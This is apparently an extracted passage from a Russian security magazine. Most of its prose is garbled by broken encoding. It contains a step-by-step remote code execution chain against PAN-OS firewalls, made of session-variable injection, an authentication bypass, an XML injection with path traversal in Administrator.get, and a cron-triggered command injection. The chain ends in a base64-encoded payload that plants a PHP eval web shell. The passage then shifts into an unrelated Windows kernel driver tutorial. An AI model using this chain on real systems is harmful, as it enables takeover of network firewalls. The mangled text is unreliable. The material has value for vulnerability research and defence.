11: $string_argout = panUserSetDeviceLocation($_SESSION['user'], $_GET['device'], � new php_string_argout());
???�???� panUserSetDeviceLocation�??????�?��??�??�?????�??�????�?
/usr/lib/php/modules/panmodule.so.
/etc/appweb3/php.ini
455: extension_dir = "/usr/lib/php/modules"
...
552: extension=panmodule.so
???�?� ???�??????,� ???� ???�???�??� ?� ???????�???� ?� ???�???� ???????�???,
???�??�????�?�????�??�???營DA.�??�?�??�??�???� ???�???�??�??�??� ?
??� ???� ????�?� ???�??,� ??????� ???� ???�????�?� ????�?????�???� ???� ????�???�
????營ntel�386.
??�??�??�??�???�??�??�???爌anUserSetDeviceLocation
??�????� deviceStr�?????�?��??�???�?燯RL�??????�?� device�(????????�
???� $_GET['device']).� ?????� ???�????� ??????�?� ?� panPhpConvertString?
ToLoc.
panmodule.c
18464: pan_uint32_t __cdecl panUserSetDeviceLocation(char *cookie, char *deviceStr, int useWriteFmt, php_string_argout *string_argout)
18465: {
...
18498:   if ( panPhpConvertStringToLoc(deviceStr, &dloc) )
??�???�?????�?�??�???�?�??�??�?�??�?????.
??�???�?????�??�???爌anPhpConvertStringToLoc
???�????�?�??�???�??�??�??�??�????�???�?��??????�??�????.
panmodule.c
19354:   strcpy(seps, ":");
...
19362:     v3 = __strtok_r(strCopy, seps, (char **)tmpBuf);
19363:     if ( v3 )
...
19377:           loc->loc = strtol(v3,��);
???�???�??�?� ?????� ???�????�?� ???�??�??,� ?� ???�??� ???�?� ???�?� ???�???�
?????� ??????�???� ?� ???????�??� deviceName.� ???�??� ???�??� ?????� ????�
?????� 0x20� ???�??.� ????� ???????�??� ???�????� ???�?????� ????�???� ????�
????,�?�??�?????�??�????�???�???.
19370:           if ( v4 �= �
19371:             sstrncpy(loc->deviceName, v3, �);
??�??� ????� ?????� ???�????�?� ???�???� ?� ???�??�???� ?� ?????�???�?� ????�
?????�??�??�????,�???�?�??�??????�??爒sysName.
19373:牋牋牋牋牋牋爏strncpy(loc?>vsysName,爒3,�);
???�?� ???�?� ???????�??� ???????�??� deviceName� ??????�???�?� ?� ???�???
panPhpSetDeviceForSession�??�???�?????�???�??�?.
18505:     v4 = panPhpSetDeviceForSession(cookie, dloc.deviceName, errMsg, �200u);
...
20823: signed int __cdecl panPhpSetDeviceForSession(pan_char_t *cookie, pan_char_t *devName, pan_char_t *errMsgBuf, pan_uint32_t bufSize)
20824: {
...
20829:   pan_char_t firstVsys[32]; // [sp+30h] [bp-2Ch]@6
...
20846:     sstrncpy(firstVsys, "vsys1", �);
?� ???�??�?� ?????�????� ????� ???�???� ???�???�??� ?????� panPhpSetDevice?
AndVsysForSession,�??????�???�??�???�?�??�????�??????�??燿loc�爈oc
?�???�???�???��??????�???�??�???.
19328:   panPhpSetSessionVar("dloc", tmpLocStr);
19329:   tmpLoc.loc = (unsigned int)panSwalIsVsysName(vsysName) �� 128 ��;
19330:   if ( vsysName )
19331:   {
19332:     if ( !*vsysName )
19333:       tmpLoc.loc = �
19334:     sstrncpy(tmpLoc.vsysName, vsysName, �);
19335:     panPhpConvertLocToString(&tmpLoc, tmpLocStr, �100u);
19336:     panPhpSetSessionVar("loc", tmpLocStr);
???�???�??�????�??�??:
https://panos.visualhack:4443/esp/cms_changeDeviceContext.esp?device=1024:aaaa:bbbb
???�??�?�??�????�??�?�??�??��?????��??�??????�??
???�?�??�??�??�??�??�??�??????�??�????�????�??�?????�??�????:
dloc|s:6:"8:aaaa";loc|s:13:"16:aaaa:vsys1";
dloc|s:6:"8:aaaa";
loc|s:13:"16:aaaa:vsys1";
dloc = "8:aaaa"
loc  = "16:aaaa:vsys1"
??�???� ???� ???�??� ???�???� ?????� ???�?????�?� ?????�????� ???�??
???�?????� panCheckSessionExpired,��??�??�??????�????�????�???�?
panBuildQueryCheckSessionExpired� ??� ???� ?????�???� ???� ???�????�?�
/usr/local/lib/shobjs/libpanApiWgetFilter.so.
libpanApiWgetFilter.c
1058:爌an_result_t燺_cdecl爌anCheckSessionExpired(ptrFuncResult�
result,爌trAuthFilter爉e)
1059:爗
...
1079:牋爎etval�爌anBuildQueryCheckSessionExpired(&myFuncResult,爉e,�
0);
libpanApiWgetFilter.c
1037: pan_result_t __cdecl panBuildQueryCheckSessionExpired(ptrFuncResult result, ptrAuthFilter me, bool refresh)
1038: {
1039:   pan_char_t *user; // ST1C_4@1
1040:   const char *v4; // eax@2
1041:   int v6; // [sp+Ch] [bp-1Ch]@1
1042:
1043:   user = myGetStageData(me->conn, "panAuthFilter.user");
1044:   pan_string_buffer_appendf(result->data.str, "<request cmd='op' cookie='%s' %s", user, &unk_8665);
1045:   if ( refresh )
1046:     v4 = "yes";
1047:   else
1048:     v4 = "no";
1049:   pan_string_buffer_appendf(result->data.str, " refresh='%s'>", v4, v6);
1050:   pan_string_buffer_append(result->data.str, "<operations xml='yes'><show><cli><idle-timeout/></cli></show>");
1051:   pan_string_buffer_append(result->data.str, "</operations></request>");
1052:牋爎eturn�
1053: }
???� ???�???� ???�???�?� XML????�??� ?� ?????�?,� ???????� ???�??� ????� ?????
?�??�????�??�????�?????�?????�??�??.
???�?� ?????�????� ?????�?� ?� ???� ???�?� ????,� ???�?� ???????�??� user.
???� ??� ????�???,� ????� ?� ???� ??� ???�???� ???�???� ??� ???�??� ???�??�??
???????�??�??�??�??�??�?�??�?�??�??.�??,�??�??�??�?,��??�????�
???????�??�?????�??????�??.
https://panos.visualhack:4443/esp/cms_changeDeviceContext.esp?device=1024:aaaa%27";user|s:
???�????�??????�??��??�??
?????:
dloc|s:15:"8:aaaa'";user|s";loc|s:22:"16:aaaa'";user|s:vsys1";
dloc|s:15:"8:aaaa'";
user|s";loc|s:22:"16:aaaa'";
user|s:vsys1";
???�?� ??????� ???�???� ???????�??� user� (panAuthFilter.user)� ???�????�?
???�??� 16:aaaa'.� ?� ??????�????� ??????� ???�???� panBuildQueryCheckSes?
sionExpired�????�??�?????燲ML????�??:
<request cmd='op' cookie='16:aaaa''  refresh='no'>
   <operations xml='yes'>
       <show><cli><idle-timeout/></cli></show>
   </operations>
</request>
??�??�?????�??� ???�??�??� ?????�?� ????�?� XML� ???????�??,� ?� ???�??� ????�
???�???�?�???
<response status="error" code="18">
   <msg>
       <line>Malformed Request</line>
   </msg>
</response>
??�???� ???�???� panCheckSessionExpired� ???� ???�?� ???�??� ???�???,
???�????�???�???,�??�????�?????�??�???�???��??�??�????�?.
libpanApiWgetFilter.c
1337:牋牋牋牋牋爄f�(爌anCheckSessionExpired(ptrMyFuncResult,爌trMyA
uthFilter)�=�
1338:牋牋牋牋牋爗
...
1341:牋牋牋牋牋爙
1342:牋牋牋牋牋爀lse
1343:牋牋牋牋牋爗
1344:牋牋牋牋牋牋爉prLog(globalMpr,��"panAuthFilter:openAuthFilter�
%s燱e燼re燿one!!!",爌trMyAuthFilter?>conn?>request?>url);
1345:牋牋牋牋牋爙
???�?????� ??????????� ????�?� ????�???�??� ???�?� ??� ????�??�??� ????�???:
https://panos.visualhack:4443/php/utils/debug.php.
??�?????�????�???�???�??��??�????�??�???�???�??????
???�?� ???�????� ?????� ???�??� ??� ???�???� ??????� ??� ???�??,� ???????� ????�
????�????�????爌anAuthCheck.
??????????? ??????
?
? �?????�?????
?????
????? ???????
??????�??????????????�??????????
??????????��?燩ALO燗LTO燦ETWORKS
????????�?????????
??�???�??� ?� ???�?????� ???�????�?.� ???� ?� ?� ?????� ???�????�??� ???�???,
?燩AN?OS�??�???燗PI.�??�?�?????�??�??�??�???��???,�??�?�??????�
??????�?????爎oute.php�?�??�?��??�???�?.
??�???� ???�??� ?� ?????�?� ???�????� ????�?� ???� ????�???�??�??� ?????�
??????�??.�??�?�???�???,�???��??�??�??�???�??????�????.�??�??
???�??� ???�???�??� ?� ???�??� ????�?????�??� ???�??,� ???????�??� ???????�
????�??�?�???�???�??�???,��???��??�?.
/var/appweb/htdocs/php/utils/router.php
3: require_once($_SERVER['DOCUMENT_ROOT'] . '/../htdocs/php/include/common.php');
4: require_once($_SERVER['DOCUMENT_ROOT'] . '/../htdocs/php/include/ExtDirect.php');
5:
6: class ExtDirect_Router extends RouterAbstract {
7:     private $_api;
???�??�????�??�?�???????,�??�????�??�??�????�??�?爎outer.php.�???�
?????,�
???�?�
?????�???�
Administrator.get,�
????�?�
???�??
?爃ttps://panos.visualhack:4443/php/utils/router.php/Administrator.get.�??�????�
??.� ??� ????�??�??� ???�??�??�?� ???� ????�?� ???� ?????,� ???� ???� ????�????.
???�???� ???�???�?� ?????�???� ????�?� ExtDirect_Router,� ???????� ????�???
???�????�??燫outerAbstract.
/var/appweb/htdocs/php/utils/router.php
6: class ExtDirect_Router extends RouterAbstract {
7:     private $_api;
...
86: $router = new ExtDirect_Router();
87: Http::headerType('json');
88: echo $router->getResponse();
??�??� getResponse� ??????�?� dispatch,� ?� ?� ?????�??� ????�??�?� ??????�???
???�??,�??????�?�?????�?��??�???��???燡SON.
/var/appweb/htdocs/php/include/RouterAbstract.php
111:     public function getResponse(array $requestData=array()) {
112:         if (empty($requestData))
113:             $requestData=$GLOBALS;
114:
115:         return $this->dispatch($requestData);
116:     }
/var/appweb/htdocs/php/include/RouterAbstract.php
25:     private function dispatch(array $requestData) {
26:         $request  = $this->parseRequest($requestData);
??�??� parseRequest� ??????�???� ???�???� json_decode,� ???�?� ????�??�???
???????�??�??�??��???�??�???.
/var/appweb/htdocs/php/include/RouterAbstract.php
18:     protected function parseRequest(array $requestData) {
19:         if (isset($requestData['HTTP_RAW_POST_DATA'])) {
20:             return json_decode($requestData['HTTP_RAW_POST_DATA']);
21:         }
22:         return null;
23:     }
????�??�????�??????????�????�??�??�??.
{
   "action": "PanDirect",
   "method": "execute",
   "data": [
       "07c5807d0d927dcd0980f86024e5208b",
       "Administrator.get",
       {
           "changeMyPassword": true,
           "template": "asd",
           "id": "admin"
       }
   ],
   "type": "rpc",
   "tid": 3
}
???�?�???�??燡SON�??�????�???�?��??�??,�????� rpc�??�???�?,�?????�
???�?�?�??�??�??�????��????�?�??????�??� action�� method� ????�????�
????�?.
/var/appweb/htdocs/php/include/RouterAbstract.php
27:         $response = $this->rpc($request);
/var/appweb/htdocs/php/include/RouterAbstract.php
49:     private function rpc($request) {
50:         try {
51:             $class  = Xml::escape($request->action);
52:             $method = Xml::escape($request->method);
53:             $tid = Xml::escape($request->tid);
54:             $params = $request->data;
55:
56:             $v=$this->isValidMethod($class, $method);
???�?????� ?????� ???�???�?� ???�??� ????�?,� ???????� ???�??� ?� $request?>
action,� ?� ?????� ???�??� ???� PanDirect.� ???�???�???� ?????� call_user_?
func_array� ???�????� ?� ?????�????� PanDirect?>execute� ???� ?� ?????�??
???????�??�??�???�??�??�?�??�???燿ata.
74:             $instance= new $request->action;
...
77:             $retval=call_user_func_array(array($instance,$method), $params);
??�???�??�?�?????�??�?????.
/var/appweb/htdocs/php/include/PanDirectLite.php
59:     function execute($callFunction, $jsonArgs) {
60:         /* @var $reflection ReflectionClass */
61:         /* @var $method ReflectionMethod */
62:         list($reflection, $isStatic, $method) = $this->checkValidRemoteCall($callFunction, true);
63:         if ($isStatic) {
64:             return $method->invokeArgs(NULL, array($jsonArgs));
65:         } else {
66:             $obj = $reflection->newInstanceArgs(array($jsonArgs));
67:             return $obj->$method();
68:         }
69:     }
? checkValidRemoteCall� ?????�???� ???�??�?� ??????:� ???�????� ??� ????�
?????�??�??�???
? ??�?�?,�?�????�???�?�??�??�??�????.�???�??,�?�??????�??� $obj
???�????�?� ?????�??�??� ???�??�???� ????�?.� ?� ?????� ???�??� ???� Admin�
istrator?
? $obj�$method()�?????�?�??�??�??�????,��????�??�??�??爂et.
??�?��???�??�??�??�??�??�???� changeMyPassword,�?�??�???�??�????
??????爂etConfigByXpath.
/var/appweb/htdocs/php/device/Administrator.php
10: class Administrator extends ManagementConfigAbstraction {
...
85:     public function get() {
...
86:         // detail viewer
87:         if ( isset($this->jsonArgs->changeMyPassword) ) {
88:             return Direct::getConfigByXpath("/config/mgt-config/users/entry[@name='" . $this->jsonArgs->id . "']");
????�????�??�???�?爔path,�??????�????�?????�??�????�?爉gmtsrvr.
/var/appweb/htdocs/php/include/Direct.php
688:     static function getConfigByXpath($xpath, $attribute=null, $options=null) {
689:         $req = XmlRequest::get($xpath, $attribute);
690:         return $xmlDoc = Backend::getArray($req, $options);
691:     }
/var/appweb/htdocs/php/include/Backend.php
377:     static function getArray($req, $options=NULL, $connectionOptions = null) {
378:         $dom = self::getDom($req, $connectionOptions);
/var/appweb/htdocs/php/include/Backend.php
350:     static function getDom($msg, $connectionOptions = null) {
351:         $msg = self::massageMsg($msg);
352:         $data = self::getConnection()->send($msg, $connectionOptions);
/var/appweb/htdocs/php/include/MSConnection.php
07: class MSConnection {
...
43:     function send($requestXml, $connectionOptions = null) {
...
50:             $this->writePayload($requestXml, $payloadLength);
/var/appweb/htdocs/php/include/MSConnection.php
07: class MSConnection {
...
95:     public function writePayload(& $requestXml, $payloadLength) {
96:         socket_write($this->sock, $requestXml, $payloadLength);
97:     }
?�?????�???�?�??�??�??�??�??�????燲ML:
<request cmd="get"
   obj="/config/mgt-config/users/entry[@name='admin']"
   cookie="cb3824b1b1fd3ac7138682ed67e03b8e"/>
</request>
???� ????�??�?� ???????�???� ???�???� ?????� mgmtsrvr� ?????�???� ???�???
pan_mgmtsrvr_client_svc.
mgmtsrvr.c
3603: void *__cdecl __noreturn pan_mgmtsrvr_client_svc(void *arg)
3604: {
?� ???????,� ????�???�???� pan_jobmgr_store_job_result� ??� ????????� ????�
?????�?� /usr/local/lib/libpanmp_mp.so.1.� ???�???� ???�???� ???�??�??
????� XML� ?� ?????�????� /opt/pancfg/session/pan/user_tmp/{cookie}/{
jobid}.xml,�??燾ookie��??�???�??�?�???爎equest.
??�??�??�??�????�??�??�??�???爌an_jobmgr_store_job_result
libpanmp_mp.so.1.c
401430: signed int __usercall pan_jobmgr_store_job_result@<eax>(int a1@<eax>, int a2@<edx>)
401431: {
...
401440:牋牋爄f�(燼1�)
401441:牋牋爗
401442:牋牋牋爏nprintf(&v5,�400u,�"%s%s",�"/opt/pancfg/session/pan/
user_tmp/",�*(_DWORD�*)(a1�+�6));
401443:牋牋牋爄f�(爌an_dir_create_tree(&v5)�=�
???�????��??�?????�???�???.�??�??�????�?�???�??�?�???�????????�
????�??�??,�????�?�??�????燲ML????�????,�??�???�?�??????�?�????
???�???� ????�??� cookie.� ???� ????�??�?� ????� ??????� ?????� ???�???� ???�?
?�??�?????�??�??�??.��?????�??�??�???爌ath爐raversal,�?�????�??�?
??� ???�??�??� ???�?� ?� ???�???� ?????�????� ?� ?????� ???�?� ??� ???�?,� ???
???�??�??�???�???�???�???�?�???.�)
???�????�??�??�????�??�?????�??�?爅bfc��????�????爐mp:
{
   "action": "PanDirect",
   "method": "execute",
   "data": [
       "07c5807d0d927dcd0980f86024e5208b",
       "Administrator.get",
       {
           "changeMyPassword": true,
           "template": "asd",
           "id": "admin']\" async-mode='yes' refresh='yes' cookie='../../../../../../tmp/jbfc'/>\u0000"
       }
   ],
   "type": "rpc",
   "tid": 3
}
???�?� ?????�???� ??� ????�???,� ???????� ?????�???� ?????� XmlRequest::get(
$xpath,�$attribute),�??�???�???�?�??�??�??�??爊ull????�??.
/var/appweb/htdocs/php/include/XmlRequest.php
39:     static function get($xpath, $attributes = null) {
40:         return sprintf('<request cmd=\'get\' obj="%s" cookie="%s"%s></request>',
41:             $xpath, Session::cookie(), self::appendAttributes($attributes));
42:     }
??????�燫CE
??�???????� ??� ????�???????� ?� ??????� ????�??�???� ?� ?????�????� ????�
??????�??�?????��??�???.
??�??� ????�??� ???�???� ??� ????�??�?� ???� ???�????�???� ???????,� ???
?� ?????� ???�??�?� ?????� cron� ?� ?????�???� ???�??� ?????�?.� ????� ??� ???� ?
???� /usr/local/bin/genindex_batch.sh,� ??� ??????�?� /usr/local/bin/
genindex.sh,�??????�???�???�?�???�??????�??�??�??��?.
/usr/local/bin/genindex_batch.sh
9:�/usr/local/bin/genindex.sh�$date�>�/var/log/pan/indexgen.log�&1
?????�???�???�??�??�????�???,�??????�????�???�????�??�??��?????�
?????�$PAN_BASE_DIR/logdb/$dir/1�(/opt/pancfg/mgmt/logdb/$dir/1).
genindex_batch.sh
2: export PAN_BASE_DIR=/opt/pancfg/mgmt
/usr/local/bin/genindex.sh
222:     echo "Updating indices for $db db"
223:牋牋for燿ay爄n燻find�$PAN_BASE_DIR/logdb/$dir/1�mindepth�
maxdepth�mtime�30爘爏ort�r`
??�??�?????�??�???�?�?�??????�???�???�?��????�???�????�????�?.
???� ????�???�?� ??� ????� ?????�?,� ?� ??,� ???� ???� ?????�????� (???????�??
$day)�?????�?��??????�???�???�?.
/usr/local/bin/genindex.sh
227:       for logfile in `find $day -mmin +5 -name pan.*.log | sort -r`
??�???,�?????�??�??�??�??�??�???�??�????�????�????��??�?????�??
???�??,� ??� ???�??� ????�???� ???????�?� ?� ?????� ?????�???� ?nd.� ??????
??????�?�??�?,�???��???�???�?????�???�??�???????�exec.
???�????�??????�???�?�???:�??�?�??�???�??�??�???�??�?�?????�
????�?�??�??�??�??�????�?.燯NIX??????�??�??�???�???�??�?��??�????�
??�??�??��?????�??�?????�?�??�???�?,�??燱indows.�?�???�???�??�?
???�?????� ????�?� ???�???� ???�?� (/)� ?� null?????� (\0),� ???� ??????�??� ???�?
???�??�?� ??????�?????.� ?� PoC� ???� ???????�??� ??????� ??????�???�?� Python
?燘ase64.
f=open('/var/appweb/htdocs/poc.php',�'w');f.write("<?php燖eval(
$_POST['jbfcthere']);?>");f.close();
python�c爀xec("Zj1vcGVuKCcvdmFyL2FwcHdlYi9odGRvY3MvcG9jLnBocCcsICd
3Jyk7Zi53cml0ZSgiPD9waHAgQGV2YWwoJF9QT1NUWydqYmZjdGhlcmUnXSk7Pz
4iKTtmLmNsb3NlKCk7".decode("base64"))
?�????�??�?????�??�??�??�??�????�?????,�??????�??�???燩HP?????,
???�?????� ??� ???�??�?.� ??� ????�????� ???????� ???�?????�???� ??� ????�?�
/var/appweb/htdocs/,�????�?�???爌oc.php�??�???�?�???�?�??.
{
牋�"action":�"PanDirect",
牋�"method":�"execute",
牋�"data":燵
牋牋牋�"07c5807d0d927dcd0980f86024e5208b",
牋牋牋�"Administrator.get",
牋牋牋爗
牋牋牋牋牋�"changeMyPassword":爐rue,
牋牋牋牋牋�"template":�"asd",
牋牋牋牋牋�"id":�"admin']\"燼sync?mode='yes'爎efresh='yes'�
cookie='../../../../../../opt/pancfg/mgmt/logdb/traffic/1/*�print�
?exec爌ython�c爀xec(\"Zj1vcGVuKCcvdmFyL2FwcHdlYi9odGRvY3MvcG9jLn
BocCcsICd3Jyk7Zi53cml0ZSgiPD9waHAgQGV2YWwoJF9QT1NUWydqYmZjd2Fza
GVyZSddKTs/PiIpO2YuY2xvc2UoKTs=\".decode(\"base64\"))�'/>\u0000"
牋牋牋爙
牋燷,
牋�"type":�"rpc",
牋�"tid":�3
}
??�???�???,� ??� ??????� ??????�?????� ????� ?????�?,� ????�?� ????�?� ????�
?????:� ????�?� ?� Base64� ?????�???�?� ???�?,� ??� ???????� ??� ????�???�???.
???�?� ???�?� ?� ???,� ???� ???�??� ???�????� ?????� ????� ??� ????�?� 255� ????�
?????.
???�?� ????� ???� ???�??� ?????�????,� ???�?� ?????�???,� ????� ?????�????
??????�?�??????�??.�??�???�???�???�?��,���??�?????�??�???
????,�?�???�??�??�??�??????�????.
/etc/cron.d/indexgen
SHELL=/bin/bash
0,15,30,45 * * * * root /usr/local/bin/genindex_batch.sh
??�?????�??�??�??�??燩AN?OS
??�????燩oC�?�?????�??�?�??��??.
????????????�?????????�(?????)
??????
???� ?????� ????�??�??� ???�????�?� ???�???� ?� ???�???�???� ??????�???,
???????� ??� ???????� ????�?� ??????�?� ???�??????�??� ???????�????.� ????
?� ???�????�??� ????????�??� ?� ???????�?� ?� ???,� ???� ??????�?,� ???�?????
??�??????�?,��??燽ad爌ractice,�????�??�??????�??�???�?�????�???�?.
???�????,� ?????�??� ???�????� ?� Shodan� ???�?� ????�???� ???�???�?� ?????
?????�?????�??,�??�??�?�??�?????�????.
??�?� ???�?� ?????�???,� ???� ?????�?� ???�????�?� ?????�???�?� ??� ???�?
?????�???�?????�?.� ???� ???�??,� ???� ???�???� ?????� ????�??�???�???�?� ????�
??????.��???�?????,�??�??�??�???,�?�?????�?�????�??�?�????�????
?????�???�??.
???� ??� ?????� ????� ???�???,� ???�?� ??????�?,� ???�?� ????�???�?,� ????
?�??�?�??????�???�?�????�????.
?????
??????
??�???????
Nik Zerof
xtahi0nix@gmail.com
???�??????�???�??????
??????�???燱INDOWS
?�???????�???????
???� ?????????�??� ????�????� ?????�??� ???�???�??,� ????
??� ???�??�?� ???� ????�???�?,� ??????�???� ????�???�??
??????�?????�???�(ring�,�????�??????�?????�?�????�
????�??� ??� ???�???:� ??????� ???�??�??� ??� ?????�????,
????�??� ???�?????� ???????,� ??????�??� ????�??�??
???????�??� ?� ???�?????� ??????�?� ???�???� ?� ???????�??
???�??�??��??�???.�???��???�????�???�????�???�??,
??� ???�?????� ????�???�?� ??� ???� ??� ??????� ????�?????�?
(ring� 3)� ???�???�????.� ???� ??� ???�????�?� ??????�?� ??� ???
??????� ???�??�???�???.� ???????� ?� ????????� ????�???�??
????�??.��???�?????��?????,�??�??�???�???.
INFO
???�??�?????� ????�??�???� x86� ?� x64� ???�?
??????� ????�?� ??????,� ??� ???????� ?� Windows
??� ???�?� ??????�???�?� ???�?� ???� ?� ???� ring� 3
(?????� ????�?????�?)� ?� ring� 0� (?????� ????).
????�?� ???�??,� ???� ???� ??????� ????� ?� ?????
???�???�???�??�??� ?� �???粻 ??????� ???.
??� ?????� ????� ????�??�???� x86/x64� ???�???�?
????�???�?� ???� ????:� ???� ???�??????� ???�?????�
?????�(hypervisor爉ode),�??????�??�???�?�????�
???�1�(ring�1),��????�??�????�?�??????�??
(System� Management� Mode,� SMM),� ???�?????�?
????�??� ?2� (ring� ?2),� ??????�?� ???�????� ??????
??????�???��????�?????.
????,�?�?????�?????�???�???�??�???�??.�??�??��?????�??�??�???�
?????.� ?� ???????� ??????�?????� Microsoft� Visual� Studio,� ???� ?????�??� user?
friendly營DE.�??�?�???�?????�????�???�?????燱indows燬DK�燱indows燚ri?
ver燢it�(WDK)�??�??�?�??�??�?.�??�?�???,��???�?�??????�??�?????�
????� ??????� ???�???�?,� ???� DebugView� (????�???� ????�??�???� ??????),� Dri?
verView� (???�???�?� ????????� ???�??� ????� ????�??�?????� ????�????)� ?� Kmd?
Manager�(????�??�??�?????�???�????).
????�???�燱indows�??????�燰ista�????�???�??�?????�???�?????�?
(User?Mode� Driver� Framework,� UMDF),� ???� ?� ??????� ????� (Kernel?Mode� Driver
Framework,� KMDF).� ?????� ???�??� ????�???� Windows� Driver� Model� (WDM)
?????�???�燱indows���??�??�??�???�?�???�??�???.
????�???� UMDF� ???�?� ???�???� ?????� ????�????�??� ???�?,� ???� KMDF,
????�?�??�?????�???�?,�??�????,�??�??????�??�?????�???�?,�??�???�
???�???�?燯SB.�?????�???�???�??,��??�???�??�??�??�??�?:�?�???�
????�??�?�???�?????,��???�?��?�?????�??�?�??????�??�???�??�???�
??????�???��????�????�???�?.�????�???�???�??�?�??�??????燿ll.
???� ??� ????�????� ??????� ????� (KMDF),� ??� ??� ???�?????� ????� ????�?,
?� ???�??????� ???�??,� ???�?????�??� ??� ????,� ?� ???� sys.� ?� ????� ??????� ??
??????�?� ??????� ????�??� ????�???� ??????� ????,� ???????� ????�??
???� ????�??� ???�??�??� ???????� DKOM� (Direct� Kernel� Object� Manipulation)
?�??�??�?????.
????????�???????燢MDF
???�?�???�??�?�??�???�??�??�???�???,燰isual燬tudio�???�???�??�?�???�
???�?� ??????�??� ???????�?.� ???�??� ?????� ???�?????�???�?� ?� ?????�??
????� ?� ????�???�???� ?� ???,� ?????� ???�???� ???�????�?.� ???� ????�??� ?
???燦ATIVE,�??�????�?�??�???�???�?,�??�??�??�???,�??�?�?????�????�
????.
???�?�??�?��???�??
????�?�?????,�??�?�??�?��???�??�????�???�????��?�????�???
??�???�?????,�??????��??????�??�??�????�?�??�???�entry:[Driver?
Entry],�??� [DriverEntry]��??�????�??�???,�??????�?�????�??�???
????�????.� ????� ?� ????�??� ???�???�???� ????????� ???�???� ????�?� ???????�
????爉ain,�?��???�????�??�?�??�?�??�???�???????燚riverEntry.
???�?????�??�????�??:
NTSTATUS DriverEntry (PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath);
??�??� ????�??�?� ??� ???????�??,� ???????� ??????�???� DriverEntry.
pDriverObject� ???�?� ???� PDRIVER_OBJECT,� ???� ???�??,� ???� ???� ???�?????
??�????�???� DRIVER_OBJECT,�??????�????�??�??????�??��????�????�
????.� ??� ?????� ??????� ??????�??� ????� ????� ?????�???,� ???� ?????� ?????
????�???� ????�???.� ???�??� ????????� ???�?� ???� PUNICODE_STRING,� ???????
????�???�??�?????�?�???�?�???� UNICODE.�??,��???�??�???,�??�???�?,
???��??�?????�???�??�??�??�?�??????�??��????�???�???.
WARNING
??�??� ????�?� ?� ????�???� ?????� ???�???� ?????�
???�?????� ????� ?� BSOD.� ????�???� ??????� ????�
???��??�????�??�??�???.�??�????�????�?�
???????�??�??�?????��??�????�??�?????.
Interrupt燫equest燣evel�(IRQL)
IRQL� ?� ???� ???�??�?????� �??�??�??粻 ???� ????�????.� ???� ????� IRQL,� ???
????�??�??�?�??�??�???�????�????�??�?????�????�????�?????�???.
?????�??�?� ???�???�?� ????�??� IRQL:� Passive,� APC,� Dispatch� ?� DIRQL.� ????
???????� ???????�????� MSDN� ??� ???�??�?� WinAPI,� ??� ???�?� ???�???� ????�
????�??,� ???????� ???�????�???�?� ???�???� IRQL,� ???????� ???�???�?
???� ????�????� ?� ???�??� ???�???.� ???� ????� ????� ???�???,� ???� ????�?
WinAPI� ???� ???�????� ???� ??????�??????.� ???�??� ???� ????�?� IRQL� ???????�
????�?�??�??�??�???�??�???�??�???�??�??�?,�??�???燚IRQL�??�???�?
????�??�??��????�??????�?�???�????��???�??�??�?�???�???.
??�???�??�???�??�????????�(Input/Output燫equest燩acket)
IRP��??�??�???,�??????�??�???�?��???�???.�???�?�??�?????營RP
????� ????�??� ?????� �??�?????粻 ???�???� ??????� ???�??� ????�??� ????
????????�??�??�?�???�????,�??????�?�??????�?.營RP�?????�???�?�???�
?????�??� ???�????????� ??.� ???�?� ???????� ????�????� ???�??�?????� ????
IRP,� ??� ???�??� ???????�??�?????� ???�???� ???????�?� ??????� ?� ???�??�??
??�??�??�??�??�???�??�?�??�???.�??�???�?�????:
for(x = 0; x < IRP_MJ_MAXIMUM_FUNCTION; ++x)
   pDriverObject->MajorFunction[x] = MyCallbackFunc;
?�??�??�??�???????�????,�??????�???�?�??�??�???�??�??�??�??� STA?
TUS_SUCCESS.��???�??�???�?�???�???�???�??�??營RP.
NTSTATUS MyCallbackFunk(PDEVICE_OBJECT pDeviceObject, PIRP pIrp)
{
   pIrp->IoStatus.Status = STATUS_SUCCESS;
   IoCompleteRequest(pIrp, IO_NO_INCREMENT);
   return pIrp->IoStatus.Status;
}
??�???�????�??�??��?????�???�???�??????�??�???????�????,�??????
????�?�??�??�???燬TATUS_SUCCESS.�?�??,�???�??�??�?�??�?????�????�
???� ???�???� ??????� ???�???�??,� ???�????� ???�???� ????�????�??� ???�????
???�??�?�????�??�???�??????�???�??�???�?:
#define IRP_MY_FUNC 0x801
?????� ??� ???�??�?� ???�???�?� ?� ???�??� IRP_MY_FUNC� ?� ??� ?????� ?� 0x801.
???�?� ????�??� ??� ????�????,� ??� ???�??� ???�??�??� ??� ???� ????�?,� ???�??
?????�???�??�????�?????�??�??�?�??�?��???�??:
//�???????�??�???營RP�??????�?�???????????????
for(x = 0; x < IRP_MJ_MAXIMUM_FUNCTION; ++x)
   pDriverObject->MajorFunction[x] = MyCallbackFunc;
//�???????�????�??????燤yCallbackControl�?�?????營RP_MJ_DEVICE_C
ONTROL
pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = MyCallbackControl;
???�?� ???�?� ???� ???�?� ????????� ???�?????� ??� ????� IRP,� ???????� ??� ?????
????�???�???.� ???� ????�???� ???� ??????� ???�???� IoGetCurrentIrpStack?
Location,�?�???�??????�???�???�??�?????�?�????.�??�?�??�?,�????�
??????� ?????� ????????� ??� ???�????�?� ???�????????� ???�???� ???????� ????�
?????????,�??�?�????�??�???????�?????�???��???????�??�??�?�????�
????????�??�?� ???�???�??.� ???�?????� ???� ???�???� ????�??�???� ????????�
????�??�???�?:
//�???????�????????�?�???營RP�?????
PIO_STACK_LOCATION pIrpSt = IoGetCurrentIrpStackLocation(pIrp);
//�???????�?????�?????�????
ULONG InBufLen  = pIrpSt->Parameters.DeviceIoControl.InputBufferLength;
//�???????�?????�?????�?????
ULONG OutBufLen = pIrpSt->Parameters.DeviceIoControl.OutputBufferLength;
//�???????�??�??????????�????????
ULONG CtrlCode = pIrpSt->Parameters.DeviceIoControl.IoControlCode;
NTSTATUS status = STATUS_SUCCESS;
switch(CtrlCode)
{
case IRP_MY_FUNC:
牋�//�????�??,�??????�????�?????????�??????????�?????????�
IRP_MY_FUNC
break;
default:
   status = STATUS_INVALID_DEVICE_REQUEST;
break;
}
return status;
???�????�?????�???�???�???
???�?�??�??�??�???�???��???�????,�?�??�??�??�???牜???�??????????�
????�???�???�.�??�??�?�?????�???燗PI????�???� IoCreateDevice.�??�?
????,� ??� ???�????� ???�??????�??� ????�?� ??� ???� ????�??,� ???�?� ??� ???
?????��??�????�?�??�????????��????�????� \Device.�???�??�?�?�???�
